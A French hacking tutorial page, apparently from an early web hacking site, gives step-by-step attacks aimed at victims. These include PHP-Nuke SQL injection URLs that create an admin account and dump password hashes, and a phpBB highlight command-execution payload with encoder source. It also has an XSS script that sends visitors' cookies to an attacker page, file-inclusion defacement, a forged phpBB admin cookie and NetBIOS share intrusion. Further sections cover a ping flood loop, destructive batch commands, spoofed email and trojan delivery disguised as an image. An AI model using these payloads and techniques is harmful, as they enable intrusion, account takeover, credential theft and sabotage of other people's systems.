Ne vous fiez pas à ce que l'on vous dit, le monde de l'underground n'est sûrement pas ce à quoi vous vous attendez...
Il ne rime pas avec destruction gratuite de tout systeme fragile sur le web. Le hacking est plus que ça, c'est une autre façon de voir les choses. C'est un monde d'entre-aide, de découverte et de curiosité.

 

 

PHP NUKE

Faille highlight

Faille XSS

Faille include

Un exploit

Le SQL

Faille Netbios

Cookies

Ping of the death

Des virus en batch

Mail anonyme

Denis

Allopass

Anonymat

Un crack

Trojan

Le vbs

Dossier cible

Télécharger un fichier flash

Qu'est ce qu'une ip ?

Cryptage Xor

Waste / logiciel P2P

Virus

Tutos

Mail bonbing

Faite votre radio sur le web

Phreaking

Faille include 2

Pds bannieres

Protection flash

Netsend

Netsend 2

Comment trouver une ip

Faille IE : spoofing d'url

Trojan 2

Intrusion réseau

Adresse ip 2

Arp redirect

Batch

Bios

Bordement

Buffer

Caramail

Carding

Forum

Hacker une personne

Hacker un site

Hotmail

Newsletter

Inscription

désinscription

 

PHP NUKE

Quesque PHP NUKE?
PHP NUKE est un portail en php trés facile d'accés nul besoin de si connaitre en programmation web...
Malheuresement ce portail permet de nombreuse injection SQL...

Comment faire une SQL injection?
Voici comment ce mettre amdin sur le site:

www.lesitephpnuke.com/admin.php?op=AddAuthor&add_aid
=loadation_aos&add_name=God&add_pwd=jadore&add_emai
l=tony@aos.com&add_radminsuper=1&admin=
eCcgVU5JT04gU0VMRUNUIDEvKjox

Une fois l'injection faite allez vous indenfier dans www.lesitephpnuke.com/admin avec les identifiants suivant:

login: loadation_aos
mot de passe: jadore

Et voila si le webmaster ne s'est pas protéger(patch ou version + récente)vous aurez les droits d'admin...

Comment regarder les message personnel des admins:
www.lesitephpnuke.com/modules.php?name=
Private_messages&file=index&folder=inbox&user=
eDpmb28nIFVOSU9OIFNFTEVDVCAyLG51bGwsMSwxLG51bGwvKjox

Comment uploader et modifier les download du site:
www.lesitephpnuke.com/modules.php?name=
Downloads&d_op=modifydownloadrequest&lid=
-1%200UNION%20SELECT%200,username,user_id,
user_password,name,user_email,user_level,o,o%20FROM%20nuke_users

Comment recuperer les mot de pass cryptés des admin :
www.lesitephpnuke.com/modules.php?name=
Search&type=stories&query=f00bar&category=
-1&categ=%20and%201=2%20UNION%20SELECT%200,0,
aid,pwd,0,0,0,0,0,0%20from%20nuke_authors/*

Il y a plein d'autre SQL injections mais à vous de les trouver, et bien sur, ces injections sont valable juste pour phpNuke !!

Faille highlight

Alors qu'est ce que cette faille highlight ? C'est une faille qui touche tout les forum phpbb < v 2.0.10 (quand je dit tout... euh, ce qui ne sont pas patchés !) Et qui vas permettre d'avoir un shell arbitraire sur le serveur cible!
une "shell nianian" quoi ?
Shell = execution, grace a cette faille vous allez pouvoir executer tout ce que vous voudrez sur le serveur cible !

Commen proceder ?
Alors la faille est contenue dans le fichier "viewtopic.php"... Je sais, ca ne vous avance pas beaucoup mais c'est bon a savoir pour la culture general !
Sur les forum phpbb il est possible d'effectuer une recherche, et, apres avoir effectuer une recherche sur un mot vachement courant comme "bonjour" ou autres, de multiples choix de topic arrivent devant vos yeux ebahis. Quoi de plus normal me diriez vous ? Et je vous repondrez de continuer a lire...
Cliquez sur n'importe lequel des resultat, et vous accederez au topic dans lequel a été trouvé le mot a rechercher, ici "boujour".
Attention, on en arrive a la faille ! Vous pouvez voir aussi que le mot bonjour est en gras !!! Et que l'url finira comme ceci "&highlight=bonjour" !
C'est la que reside la faille !
On vas pouvoir replacer "bonjour" par n'importe quel commande DOS ! C'est t'y pas zoli ca ? grace a cela vous pourrez faire ce que bon vous semble du serveur !
Alors petit probleme, c'est que la commande aura une syntaxe assez specialle... Par exemple, il ne faudra pas faire

&highlight=dir
Mais
& highlight=%2527%252esystem(chr(100)
%252echr(105)%252echr(114))%252e%2527

Oula... Un peu compliqué tout ça non ? Mais alors comment savoir l'équivalent correct d'une commande ??
Et bien j'ai pensé a tout ! je vous ai programmé en vb6 un petit exploit qui vous permetra de "transcrire" n'importe quel commande (dir, del, format...etc.) en son equivalent correct ( chr(100)%252echr(105)%252echr(114))%252e%2527 ...etc.)
Ammusez vous bien !
Ci-dessous, la source de l'exploit commentée

Private Sub Command1_Click() ' des que l'on cliquera sur le bouton command1 ...
If Text1.Text <> "" Then

Text2.Text = "" 'réinitialisation de la zone de texte "resultat"
Text2.Text = "%2527%252esystem(" 'voici le debut de notre "requette"
'qui reste inchangée
'quelque soit la commande

Dim a As String 'declaration de la variable qui vas contenir
'toute les lettres une a une de notre commande a
'traduire

For intI = 1 To Len(Text1.Text) 'debut de la boucle qui vas se repeter autant de fois
'qu'il y a de caractères dans la zone de text qui
'contient notre commande
a = Mid(Text1.Text, intI, 1) ' la variable "a" est egale au premier caractère
' de la zone de texte qui contient la commande
'au premier tour de boucle, le deuxiemme caractère
'au deuxieme tour de boucle...etc.
If intI <> Len(Text1.Text) Then 'si intI (qui est egale au nombre de fois
'que c'est repété la boucle) est different
'du nombre de caractères que contient la zone de texte
'qui contient la commande
Text2.Text = Text2.Text & "chr(" & Asc(a) & ")%252e"
' alors la zone de texte du resultat est egale a elle
' meme ainsi que "chr(Le_Code_Ascii_du_caractère_contenu_dans_a)%252e"

Else 'autrement
' la meme chose mais sans le )%252e final !
Text2.Text = Text2.Text & "chr(" & Asc(a) & ")"
Exit For ' et on sort de la boucle

End If ' fin de la condition
''''''''''''''
Next intI ' delimite la boucle

Text2.Text = Text2.Text & ")%252e%2527" ' des que tout ca est fini, ou rajoute ca au resultat

Else
MsgBox "Oh ! Il faut metre quelquechose dans la zone de texte boudiou !"
End If
End Sub ' action terminée

Private Sub Command2_Click()
MsgBox "Merci beaucoup ice' ! Cette exploit je ne l'aurais jamais créer sans tes conseils"

End Sub

Private Sub Command3_Click()
Text1.Text = Combo1.Text
End Sub

Private Sub Form_Load()
Combo1.AddItem "dir"
Combo1.AddItem "qprocess"
Combo1.AddItem "tasklist"
Combo1.AddItem "qprocess"
Combo1.AddItem "net stop"
Combo1.AddItem "tskill"
Combo1.AddItem "taskkill"
Combo1.AddItem "del"
Combo1.AddItem "format"
Combo1.AddItem "shutdown"
End Sub

Faille XSS

Tout d'abord quesqu'une faille xss???
Une faille xss c'est quand on a possibliter d'insérer du HTML ou Javascript dans un livre d'or,chat ou forum...
Grace à cette faille on peut par exemple faire une alert,une redirection ou meme recupere les cookies des visiteurs.

Comment trouver cette faille???
C'est simple il suffit d'insere un petit message entre 2 balise tel que <i>Yop a la noix de coco</i>...
Si le texte est en italique,la faille est présente...

Que faire de cette faille???
On peux par exemple faire un message d'alert,ce qui donnera ça:
< script>alert('Hacked by SpyneNetwa')</script>

Dorénavant quand on ouvra cette page le message "Hacked by SpyneNetwa" s'affichera...

Quelque fois le HTML n'est pas autorisé et la il va falloir changer de technique,en effet il suffit juste d'intégrer ça:
[img]javascript:alert('Hacked by SpyneNetwa')[/img]

Explication?Quand le serveur exécute la page il trouve les balise image et cherche son contenu,ne trouvant pas d'image il met le script.
On peut aussi se servir de la balise plaintext pour afficher le code en texte...

Comment récupérer les cookies?
Il va falloir heberger une page appelé recup.php...
Dans la page recup.php on met le code suivant:

< ?
if($ cookie){
$fp=fopen(" cookies.txt","a"); // On ouvre le fichier cookis.txt
fputs($fp,"$ cookie\r\n"); // On écrit le contenu du cookie dans le fichier
fclose($fp);
}
?>
< script>
opener=self;
self.close(); // ferme la fenètre
< / script>

Bon ensuite on retourne sur le forum et on poste une xss:
Amener moi vos cookies<script>window.open(" http:// www.votresite.fr/recup.php? cookie="+document. cookie);</ script> .

Et voila sur votre ftp un fichier cookies.txt va se créer ou vous pourrer récupérer les cookies...

Pour se proteger, vos codeur PHP ne doivent pas oublier qu'il existe une fonction qui permet d'enlever les balises HTML et PHP => strip_tags(); !

Faille include

1) Quesque c'est t'y cette chose ?
La faille include c'est la possibilité d'inserer du code malveillant dans une page deja existante.
Je traduit => si vous trouvez une faille include sur un site, vous pourrez faire a peu pres tout ce que vous voudrez avec !

2) présentation
Tout d'abord qu'est ce que ce "include" dans "faille include" et bien, les include sont les outils des fegnants !
Au lieu de repeter des centaines de fois la meme protion de code, on créer une page "portion_de_code.php" puis on l'inclus
la ou en a besoin grace a la commande "include".
exemple =>

<?
// code quelquonque ...
// didonc, ici j'aurais bien besoin du code long et chian que je doit mettre au moins 10 fois dans toute les pages de
// mon site !
//
// A mais j'alais oublier, c'est cool alors ! Je n'ai pas besoin de me faire chier a le taper, vue que le l'ai mit dans la
// page "code_long_et_chiant_a_taper.php" !!

$page_a_inclure = "code_long_et_chiant_a_taper.php"; // je stoque le nom du fichier dans une variable (dans une boite)
include("$page_a_inclure"); // et je l'inclut !

// Cool je ne me suis pas fait chier a taper tout le code ! A la place, j'ai tapé que 2 mini-ligne de code ! cooool
?>

3) Exploitation
alors, c'est bien zoli tout ca mais comment voit on si une page est incluse ?
regardez l'adresse suivante :

http://siteouaib.com/index.php?page=coolCaAlors.php

remarquez bien le "page=coolCaAlors.php"
La page "coolCaAlors.php" a été incluse !!

Cela ne veut pas dire pour autant que le site est vulnerable ! Alors procedons a un test :
a la place de :
http://siteouaib.com/index.php?page=coolCaAlors.php
essayez
http://siteouaib.com/index.php?page=http://www.google.com

si google s'affiche au beau milieu de la page, c'est que le site est vulnerable !
C'est donc la que reside cette faille , dans le fait que l'on peut inclure n'importe quel page au sein d'une autre

si on met :

http://sitealacon.com/index.php?page=
http://www.http://users.rockweb.org/Raven45

Le site sera inseré dans index , si ce n'est pas le cas c'est donc que la faille est bouchée
Cette faille donc va nous permettre d'inserer un code malveillant venant d'un autre site sinon mieu du notre ^^
ex : sur mon site je crée un fichier inc.php et dedans je met :

<?
$fichier=fopen('index.php','a'); //cette ligne ouvre le fichier index.php
fwrite($Fichier,'Web Site Defaced'); // Cette ligne ecrit dans index.php
fclose($fichier); // On ferme le fichier , Facultatif
?>

Donc on a cette page sur notre serveur que je nomerai http://toto.fr
Maintenant on procede a l'inclusion :
http://sitealacon.com/index.php?page=http://toto.fr/inc

Et voila le site est "defacé", du moins, la page principale a été modifié pour simuler un defacage vu que les autre page sur
le serveur sont intactes !

C'est ti pas bo tout ca ?

Mais attention !! il ne faux pas mettre :
http://sitealacon.com/index.php?page=http://toto.fr/inc.php
mais
http://sitealacon.com/index.php?page=http://toto.fr/inc
car sinon le fichier sera interpréter sur votre serveur !!

4) L'include local

Sachez que grace a la faille include, vous pouvez aussi inclure des fichier interessant présent sur le serveur cible ! (passwd.txt, htacces, htpassd, la DB ...etc.)
un exemple suffira a vous faire comprendre :

http://sitealacon.com/index.php?page=protect/.htpasswd

Et tadaa, htpasswd s'affiche au beau milieu de la page !

5) Correction de la faille

C'est bien joli de s'avoir l'exploiter cette faille, mais encore faudrait il savoir la corriger !!
Au lieu de mettre le code de l'exemple on va remplacer par ca :

< ?
$page_a_inclure = "code_long_et_chiant_a_taper.php";
if (file_exists($page_a_inclure)) { //verifie si le fichier existe bien sur le serveur
include("$page_a_inclure.php"); //inclus la page EN PHP
}
else {include("404.php");} //inclusion d'une page d'erreur
?>

Un exploit

Alors qu'est ce qu'un exploit ? Un exploit est un petit programme, créer le plus souvant en C, perl, python, php et qui a pour but d'exploiter une faille ;-)
Je ne vais pas ici vous lister tout les exploit existants mais vous donner les site ou vous pourrez trouver les touts derniers exploit pour tout ce que vous voulez :
http://packetstormsecurity.org
http://www.osvdb.org
http://www.securitytracker.com
http://www.vulnerabilite.com
http://www.securityfocus.com
http://www.k-otik.com
http://packetstormsecurity.nl/
http://www.iss.net/
http://8088.org
http://www.securiteam.com/
http://phreak.com/html/main.shtml
http://www.hoobie.net/security/exploits/
http://www.secureroot.com/category/hacking/
http://www.astalavista.com/index.php?section=dir

2) Utiliser

En voila une question qui revient souvent !
Apres avoir lut ce tuto vous saurez determier en quel language l'exploit a été codé, puis vous saurez l'utiliser !

Alors, comment ai-je fait pour le savoir !
Et bien il y a des "indices" dans chacun des codes qui nous permet de le savoir !

Si dans un exploit vous voyez des
#include <quelquechose.h>
Et des
printf(quelquechose);
Vous pouvez etre sur que l'exploit a été codé en C !
Mais, comment s'en servir ?
Il vous faut un compilateur C comme DevC, quincy, borland C . . . E t c. Puis grace a ces logiciel, créez un nouveau projet, puis une feuille de code dans laquel l'exploit, enregistrez, puis incluez la au projet, et pour finir C O M P I L E Z et E X E C U T E Z !

Si dans un exploit vous voyez des
$quelquechose = quelquechosed'autre;
Vous pouvez etre sur que l'exploit a été codé en PHP !
Alors pour vous en servir, vous devez telecharger le logiciel EasyPHP, l'installer, l'executer, puis créer un dossier "Mes Exploits" dans \Program Files\EasyPHP1-8\www\
Ensuite vous allez mettre la source de votre exploit dans le bloc note et enregistrer sous "Ce_Que_Je_Veut.php" puis deplacer ce fichier dans \Program Files\EasyPHP1-8\www\Mes Exploits
Ensuite, faite un click droit sur la petite icone en forme de E qui s'est placé a gauche de l'heure (a droite de la barre demarer ( . . . ) ) et cliquez sur "Web Local" .
Une fenetre s'ouvre, cliquez sur le bouton "Mes Exploit" et admirez le travail !

Si dans un exploit vous voyez :
< html>
Ou pleins d'autres balise ( <jeSuisUneBaliseVuQueJeSuisEncadréDePlusPetitEtPlusGrandQue> cf tuto HTML partie tuto divers )
Soyez sur, c'est du HTML ! Pour l'utilisez, ouvrez le bloc note, deposez y la source de l'exploit, puis enregistrez sous "CeQueVousVoulez.html" et executez (ou faites executer a la victime. . . Enfin ca depend de l'exploit)!

Si en entete d'un exploit vous voyez
#!/usr/bin/perl
Soyez certain, c'est du perl !
Pour s'en servir, telechargez le programme ActivPerl, installez le. Parallèlement mettez la source de votre exploit perl dans le bloc note et enregistrez sous Ce_Que_L_On_Veut.pl
Maintenant, demarer>executer>command (ou cmd) >
perl Le_Chemin_Complet_De_Votre_Exploit_Perl
Exemple
perl c:\monexploit.pl
Vous obtiendrez alors des infos sur les paramètres a definir.
Les paramètres ? Kesako ??
Imaginez un exploit qui permet de detruire n'importe quel site ! Juste en indiquant L'URL du site et l'ID le l'admin ! Et bien il vas falloir l'indiquer a l'exploit ! On aura donc un truc dans le genre
perl c:\exploitGenial.pl http://www.Le-Site-a-Detruire.com administrateur
Et bien "http://www.Le-Site-a-Detruire.com" et "administrateur" sont des paramètre a l'exploit !
Donc pour avoir des infos sur les paramètres a indiquer a l'exploit :
perl c:\monexploit.pl
(sans paramètres !)
Puis grace aux info qu'il vous sera donné, vous saurez exploiter l'exploit !

Si en entete d'un exploit vous voyez
#!/usr/bin/pyth0n
L'exploit a été codé en Python !
Pour s'en servir, telechargez le programme python, installez le. Parallèlement mettez la source de votre exploit python dans le bloc note et enregistrez sous Ce_Que_L_On_Veut.py
Maintenant, demarer>executer>command (ou cmd) >
python Le_Chemin_Complet_De_Votre_Exploit_Perl
Exemple
python c:\monexploit.pl
Vous obtiendrez alors des infos sur les paramètres a definir.
Puis grace aux info qu'il vous sera donné, vous saurez exploiter l'exploit !

Le SQL

Alors tout d'abord qu'est ce que le SQL ?? Le SQL est un language devoué a la gestion de base de donnée. ==> traduction : Quand, par exemple, vous vous inscrivez sur un site, toute les info que vous avez entrer pour votre inscription (email, pseudo, mot de passe...etc.) Sont stoquée dans une DB (=> Data base => base de donnés), Et pour acceder a cette DB, modifier son contenu...etc. On utilise le SQL !

Alors, venons en a l'attaque... Mettons un site, dans lequel il y a un champ de recherche qui vas vous permettre de rechercher un membre... En fait, quand vous allez cliquer sur le bouton "rechercher", une requette vas etre envoyé sur la DB.
Requette :
SI dans la partie Membre de la DB il y a un membre qui a pour nom "contenu du champ de texte" alors on affiche le resultat !

Au lieu de dire "partie membre" je vais employer le therme de TABLE membre... Alors une table est donc une partie de la DB ! Une DB est en effet secionné en une ou plusieurs table dans lequel sont stoqué les information correspondantes !
Par exemple la table membre qui vas contenir votre pseudo et votre mot de passe
Ou la table NewLetter Qui contiendra votre e-mail !
En SQL la requette aurais resembler a ceci :

SELECT * FROM membres WHERE pseudo = 'ContenuDuCHampDeTextt';

En fait une injection vas viser a deformer cette requette ! Reprenons un exemple d'un site dans lequel deux champ de texte a renseigner, l'un un pseudo et l'autre un pass.
Si le pseudo existe dans la DB(plus precisement dans la table membre) ainsi que le pass, alors on peut continuer...
En SQL :

("SELECT * FROM membres WHERE utilisateur = '$contenuDuChampPseudo' AND motdepasse = '$ContenuDuChampMotDePasse'");

Maintenant, si je met dans le premier champ (le champ pour donner le pseudo) ceci :

' OR 1=1"); //

Notre requette vas resembler a ceci :

("SELECT * FROM membres WHERE utilisateur = '' OR 1=1"); //' AND motdepasse = '$ContenuDuChampMotDePasse'");

On a ici TOTALEMENT deformer la requette, en français ça donne ceci !

Si le pseudo(= Nom Dutilisateur) est egal a '' (et donc rien) OU que 1 est egal a 1 Alors je continue...
Sachant que tout ce qui suit "//" est considéré comme une note est donc n'est pas pris en compte !
On a fait ici une injection SQL !
Donc, en reflechissant, on peut avoir tout ce que l'on veut (mot de passe...etc.)
Encore un petit exemple :

login : '; exec master..xp_cmdshell 'net stop firewall'; --

cette requête ci-dessus aurait pour effet d'exécuter une commande shell "net stop firewall" qui stopperait l'exécution du service "firewall" !

A vous de reflechir maintenant !

Faille Netbios

Donc je vais expliquer comment utiliser une faille super vieille mais qui marche encore: la faille netbios!

Mais d'abord, qu'est ce que le serveur NETBIOs ? C'est la première question que je me pose!! Pas vous? Bon, j'y répond quand même!!
Le serveur Netbios est une couche logicielle implantée sur les cartes réseau par toutes les versions de windows jusqu'à XP. Ce serveur répond via TCP/IP à toutes les demandes via le port 137. Ces demandes retournent les informations nécessaires à la connexion à votre serveur de partage sur le port 139

En tout premier lieu, il faut commencer par trouver une victime qui a le port 139 ouvert (le port du serveur netbios). anecdote: win 98 instaure dès l'installation le partage de fichiers!! ^^ bon ok! Il suffit d'avoir updaté son OS ou d'avoir rectifié sa config soit même. Et pis c'est vrai que win 98 c'est plus d'actualité. mais en cherchant bien on trouve quelques utilisateurs négligeants, ou ignorants!

Pour trouver votre victime, il faut utiliser un scanner d'ip comme nessus ou bien superscan par exemple.
Une fois la victime reperée, on teste le port avec une commande dos:

nbtstat -A ip-de-la-victime

voilà ce qui apparait et ce que l'on recherche c'est quelque chose du genre:

NETBIOS REMOTE MACHINE NAME TABLE

NAME TYPE STATUS
____________________________________________
USERNAME <00> registred
WORKGROUP <00> registred
USERNAME <03> registred
USERNAME <20> registred <----- C'est cette ligne qui m'interresse :-)

MAC adress= 00-22-12-56-89-00 @

Quand on trouve "20" à"TYPE", on peut etre sûr que la victime fait tourner un client micro$oft avec le partage imprimantes/fichiers actif.

Bien! Maintenant, nous allons ajouter le nom du REMOTE 20 au fichier "lmhost" dans windows. Ce fichier est utilisé par la pile du client Wins (qui fait que le NetBios prime sur le TCP/IP) et contient la redirection des adresses ip vers des noms d'ordinateurs.

Ce fichier est divisé en plusieurs colonnes, la premier contient l'adresse ip, la seconde le nom de la machine hote et la troisième et les suivantes des directives et/ou des commentaires.

Donc on saisie toujours sous dos:

echo ip-de-la-victime Nom-Du-Remote-20>>c:\windows\lmhosts <---- Le nom du remote 20 ici, c'est USERNAME

Maintenand on reset le cache du netbios avant de continuer

nbtstat -R
Successful purge and preload on the NBT remote cache name table

Maintenant, il ne nous reste plus qu'a lister les ressources partagées sur la machine hôte

net view nom-du-remote-20

A DISK
C DISK
D DISK
Canon Printer
The command was completed successfully

et voila!!!!!!!!!!!!!!!!!!!!!!! tadaaaaaaaaaaaaaaaaaaaaaaa
vous avez acces aux ressources partagées de la victime !!

Pour plus de confort, utilisez la recherche d'ordinateurs, ca vous permettra de vous balader sur l'ordinateur hôte comme si vous étiez sur le votre, Pour cela:

Démarrer -> rechercher -> rechercher d'autres éléments (en l'occurence "ordinateurs") -> dans nom de l'ordinateur, on met le nom du remote 20 (toujours USERNAME dans mon cas).

 

Cookies

Ceci est une technique de hacking tres facile qui vous permetra
de vous loger en admin (avoir tout les droits !) sur un
forum phpbb d'une version egale ou inferieur à 2.0.12.

Petite preparation :

- IL VOUS FAUT FIREFOX ! Cette exploit ne marche pas avec IE !!
(Firefox est un explorateur dans le genre IE, mais en mieux ;-) )
- Une tete ,et au moins une main

Sachez avant tout que firefox stoque TOUT les cookies dans un seul fichier
("cookies.txt"), (contrairement à IE qui créer un fichier pour un cookie).
Ce fichier est stoqué ici :
-\WINDOWS\Application Data\Mozilla\Firefox
\Profiles\4sygtyn0.default (pour les win 9x)
-\Documents and Settings\votre nom(admin du pc)\Application Data\Mozilla
\firefox\profiles\tk2zmflp.default (pour les win NT)

Passons maintenant à la pratique...

1) Reperer le forum victime (Ca a l'air tout con dit comme ca... Mais c'est pas aussi simple !)
2) Verifier que sa version est < 2.0.12 (marqué en bas de la page)
3) Fermez toute les fenetre
4) Comme vous avez lancé le forum, il vous place un cookie placé dans cookies.txt,
OUVREZ cookies.txt .
5) Cherchez dans cookies.txt ceci "phpbb2mysql_data", et vous pouvez voir qu'il en suit une chaine de caractères qui commence par un "a" et fini par un "D".
6) Remplacez cette valeur par celle-ci :

a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6
%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D

7) Ouvrez Firefox, et rendez vous sur le forum
Cool En bas du forum vous voye apparaitre "Panneau d'administration" ou "Administrateur Pannel"
9) Cliquez dessus et TADAAAAAAAAAA, vous pouvez faire tout ce que vous voulez !

Petite note : Ne fait pas ça à n'importe qui ! Ce serais bete et mechant !!

Ping of the death

Je vais vous apprendre ici une technique assez simple pour faire bugger un ordinateur.

Pour faire bugger un ordinateur à distance il faut que sachiez son IP et surtout il faut que cet ordinateur n'ai pas de FireWall.
Nous allons créer un petit fichier batch qui envoira des donnés en masse à l'ordinateur victime.
Source du fichier batch :

@echo off
:start
ping IP_Victime -l 65500
goto start

Vous enregistrez le fichier sous "nimporteQuelNom.bat" puis vous l'executez et vous attendez et le tour et joué.

Des virus en batch

Nous allons créer des virus en batch, alors pour ca, vous avez besoin :
- De Batch Creator OU du bloc note (demarer > programme > accessoire > bloc note)
- D'une tete
- De au moins une main

Et je pense que c'est tout ...

Bien que tout soit expliqué dans batch creator, je réexplique (les parties les plus importantes !)

il faut que vous ecriviez sur la 1ere ligne :
@echo off
cela permettra qu'aucune chose """"disgracieuse"""" ne soit affiché (en simplifiant vraiment beacoup (plus de details : telechargez Batch Creator!!!)
Puis apres ce "@echo off" vous mettrez des commandes, qui auront un effet bien specifique mais, attention :
Pour une ligne, un commande !

exemple de commande :

ECHO votre message
Affiche votre message

%windir%\RUNDLL32.EXE User.exe,ExitWindows
Eteint l'ordinateur (en fait ceci n'est pas vraiment une commande... mais je ne m'attarderais pas sur cela)

DEL chemin
Effache le fichier "chemin" (exemple : DEL C:\windows\bureau\test.txt)

DELTREE /Y chemin
Efface le dossier "chemin" ainsi que tout ce qu'il contient
le /Y permet qu'il n'y ai pas demande de confirmation avant d'éffacer (ce qui est le cas sans le /Y)

PAUSE
attend que l'on appuie sur ue touche pour continuer

EXIT
Quitte la session DOS courante.

COPY chemin1 chemin2
copie le fichier chemin1 en chemin2
(meme fonctionnement pour MOVE qui deplace des fichier)

CLS
efface le contenu de la sortie standard (pour simplifier : efface le contenu de la fenetre)

SET NomDeLaVariable=Contenu de la variable
donc ici, je déclare un variable ... alors qu'est une variable?
Ben une variable c'est une sorte de boite dans laquel je met tout ce que je veut dedans !
exemple :

set cool=bonjour mon ami comment ca va ?
echo %cool%

Il ne vas pas s'affichier %cool% mais le contenu de la variable cool ( soit "bonjour mon ami comment ca va ?" )
A noter qu'une variable ne peut etre utilisé qu'encadré par des pourcentages ( %MaVariable% )

%0
Bon %0 n'est pas une commande mais une vaiable tres utilisée !!!
Le contenu de cette variable est en fait le chemin du batch executé
(Remarquez que cette variable n'est pas encardé par des pourcentages mais n'en a qu'un seul a sa gauche !)

FOR
Bon, la syntaxe de cette commande est la suivante
FOR %%var IN (valeurs) DO COMMANDE %%var
En fait la variable %%var vas perendre succesivement les valeurs comprises entre parenthèses
Puis cette variable est utilisé ensuite couplée a une commande
Exemple :
FOR %%a IN (cool ca va ?) DO ECHO %%a
Il vas s'affichier à l'écran :
cool
ca
va
?

Car j'ai affiché grace à "echo" la variable %%a qui a pris les valeurs comprises entre les parenthèse

>>, <<, >, <, |
Ce qu'il y a au dessus sont des redirection, explication :
elles permètent de rediriger une commande vers autre choses
Exemple :
echo coucou ca va ? > c:\windows\bureau\testCool.txt

"echo coucou ca va?" vas etre redirigé vers le fichier "c:\windows\bureau\testCool.txt" qui, si il n'existe pas, vas etre créé,
et ce fichier texte aura pour contenu "coucou ca va ?"
Mais si il existe, son contenu sera totalement éffacé pour qu'il y ai à la place "coucou ca va ?", pour que "coucou ca va ?" soit
seulement rajouté, utilisé plutôt cette redirection : ">>" qui, si le fichier existe, rajoutera seulement "coucou ca va ?", et si il n'existe pas, il sera créé aussi !

Les redirections << et < sont peu utilisés donc je ne m'attarderais pas dessus...
la redirection | (laisser le doight apuié sur ALT GR et appuis sur 6 ) redirige une commande vers une autre
exemeple
echo. | DATE
il vas seulement s'affichier la date vu que la commande date est redirigée vers echo. (alors que normalement la commande date demande à entrer la date )
Alors si on mèle les deux ca peut donner :
echo. | date >> c:\windows\bureau\test2.txt
Donc si on lance ca, la date du lancement du fichier vas etre stoqué dans le fichier "c:\windows\bureau\test2.txt"

Je ne vais pas en dire plus vus que bon nombre de commandes sont expliqués dans "batch creator" (que vous pouvez telecharger dans la partie telechargement)

Pour avoir des exemples concrets de virus batch, je vous invite à consulter la partie "virus batch

Mail anonyme

Dans cette partie, vous apprendrez à envoyer des mail anonyme avec telnet, et ceci tres simplement !
Ce qu'il vous faut :

- Telnet (deja sur windows) Ou Eric's TelNet
- Au moins une main

Lancez telnet (Demarer>executer>telnet), Vous voyez une fenetre blanche s'afficher a l'écran, dans celle-ci, faites : Connexion>Systeme distant
+ Nom de l'hote : un serveur SMTP (exemple : smtp.wanadoo.fr, smtp.voila.fr...)
+ Port : 25 (port SMTP)
+ Type de terminal : ne touchez a rien...
Puis OK

Pour l'exemple, je me connecterais au serveur SMTP Wanadoo...

220 mwinf1208.wanadoo.fr ESMTP ABO *****************
Helo wanadoo
250 mwinf1208.wanadoo.fr
mail from: <L'adresse_pour_laquel_vous_voulez_vous_faire_passer>
250 ok
(petite parhentèse : le code 250, signifie que tout est OK)
rcpt to: <adresse_victime>
250 ok
data
(RE-petite parhentèse : lorsque nous entrons "data", nous indiquons au serveur que nous avons fini de remplir les informations au sujet du "destinataire/recepteur" et que nous allons commencer a taper le message)
354 End data with <CR><LF>.<CR><LF>
subject: titre du message
aucune reponse du serveur
Puis tapez votre message et finisez le par un point sur une ligne vide
Pour se deconecter apres avoir fini : "quit"

Voila, vous avez envoyé un mail anonyme !

Trojan

Tout d'abord qu'est ce qu'un trojan ? Un trojan est une sorte de virus qui permet à quiconque connait votre ip, de penetrer votre ordinateur .
Explications :
Les transferts de donnés sur internet se font grace à un certains nombre de port, et à chaque port sa specificitée. Et bien un trojan insecurise l'un de ces ports pour pouvoir exploiter et controler votre pc.
Ceci est bien beau (façon de parler) mais comment proceder ?
Tout les trojans sont composés de 2 parties :

- Le client
- Le serveur

Le client est la partie qui vas vous permetre de controler le pc à distance, quand au serveur, c'est la partie que la victime doit executer.
Dès lors, vous devez vous poser plusieurs questions...
- Que ce passe-t-il lorsque ma victime vas executer le serveur ? Il ne se passe ABSOLUMENT rien ! Le serveur agit silencieusement.
- Comment faire passer ce serveur à ma victime ? Faites en sorte que la victime veuille executer le trojan, dite que c'est un programme qui expose toute les positions du KaMasutra ou encore faites lui croire que c'est une image en renomant le serveur "imageKoKine.jpg.exe"
- Que puis-je faire à partir du client ? Tout ce que vous pouriez faire en étant devant le pc de la victime ! Supprimer, renomer telecharger, controler la souris...etc. d'autres fonctions sont possible en fonction du client , sachez qu'il existe une multitude de trojan !!
- Ai-je juste besoin de l'IP ? Oui ! Et il vous faut aussi une bonne dose de chance, car si la victime possede un firewall il sera tres difficile de penetrer son PC (mais pas imposible ! Rien n'est imposible en informatique)

Conseils :
Ne vous attaquez JAMAIS à une ip au hasard ! Il faut connaitre la victime ! Mettons par exemple qu'elle vous ai dit quel type de firewall elle posède, vous pouvez agire en consequant (créer un petit programme que vous lui ferez executer qui desinstalerait le firewall) ! Ceci n'est qu'un exemple parmis tant d'autres !

Ci-dessous la liste des trojans les plus connus avec leurs port correspondant :

PORT | NOM
31,Master Paradise
121,BO jammerkillahV
456,HackersParadise
555,Phase Zero
666,Attack FTP
1001,Silencer
1001,Silencer
1001,WebEx
1010,Doly Trojan 1.30
1011,Doly Trojan 1.1+1.2
1015,Doly Trojan 1.5
1033,Netspy
1042,Bla1.1
1170,Streaming Audio Trojan
1207,SoftWar
1243,SubSeven
1245,Vodoo
1269,Maverick's Matrix,
1492,FTP99CMP
509,PsyberStreamingServer Nikhil G.
1600,Shiva Burka
1807,SpySender
1981,ShockRave
1999,Backdoor
1999,Transcout 1.1 + 1.2
2001,DerSpaeher 3
2001,TrojanCow
2023,Pass Ripper
2140,The Invasor Nikhil G.
2283,HVL Rat5
2565,Striker
2583,Wincrash2
2801,Phineas Nikhil G.
3791,Total Eclypse (FTP)
4567,FileNail Danny
4950,IcqTrojan
4950,IcqTrojen
5000,Socket23
5011,OOTLT
5031,NetMetro1.0
5400,BladeRunner
5400,BackConstruction1.2
5521,IllusionMailer
5550,XTCP 2.0 + 2.01
5569,RoboHack
5742,Wincrash
6400,The tHing
6669,Vampire 1.0
6670,Deep Throat
6883,DeltaSource (DarkStar)
6912,Shitheep
6939,Indoctrination
7306,NetMonitor
7789,iCkiller
9872,PortalOfDoom
9875,Portal of Doom
9989,iNi-Killer
9989,InIkiller
10607,Coma Danny
11000,SennaSpyTrojans
11223,ProgenicTrojan
